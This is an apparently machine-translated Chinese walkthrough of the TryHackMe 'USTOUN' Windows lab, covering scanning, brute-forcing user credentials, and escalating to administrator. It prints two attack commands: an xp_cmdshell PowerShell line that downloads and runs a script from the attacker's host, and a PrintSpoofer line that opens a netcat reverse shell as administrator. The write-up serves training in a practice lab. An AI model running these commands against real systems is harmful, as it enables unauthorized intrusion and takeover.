USTOUN TryHackMe 撰写/演练
USTOUN TryHackMe 撰写/演练
USTOUN TryHackMe 文章
级别:中 |操作系统:Windows
扫描
我们执行快速而积极的扫描( 不建议在真实环境中使用 ) 来检测服务器上的开放端口。
然后,知道端口后,我们将启动一个带有脚本和版本的 nmap。
枚举
我们测试我们是否可以使用匿名用户进行身份验证,我们发现我们不能。
我通常在真实环境中进行的另一项测试是使用 “来宾” 用户,通常默认启用。正如您在证据中看到的,我们可以使用它来获取用户 RID .
我们创建了一个获得的最相关用户的列表并蛮力 “摇滚你” 字典。我们将获得一些凭据。
开发
在不同服务中进行多次测试后,我们发现凭证在 “微软 SQL 服务器” 服务,从这里我们将能够加载反向shell。
xp_cmdshell powershell IEX(New-Object Net.webclient) .downloadString (\”http://10.11.30.149:8000/m3.ps1\”)
反壳连接
权限提升
我们试图读取用户标志,但我们无权访问。我们检查用户的权限,发现我们可以通过冒充用户来升级 “行政人员” 使用 “自我模拟特权” .
我们确定安装的 Windows 的确切版本。
我们下载 打印欺骗器 从中利用 github ,我们也下载 网猫 到受害者机器并运行以下命令进行监听 网猫 在我们的卡利。
.\PrintSpoofer.exe -c “C:\users\SVC-Kerb.DC01\Videos\nc.exe 10.11.30.149 444 -e cmd”
以管理员身份反转 shell
现在我们读取了这两个标志。
用户标志
管理员标志
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明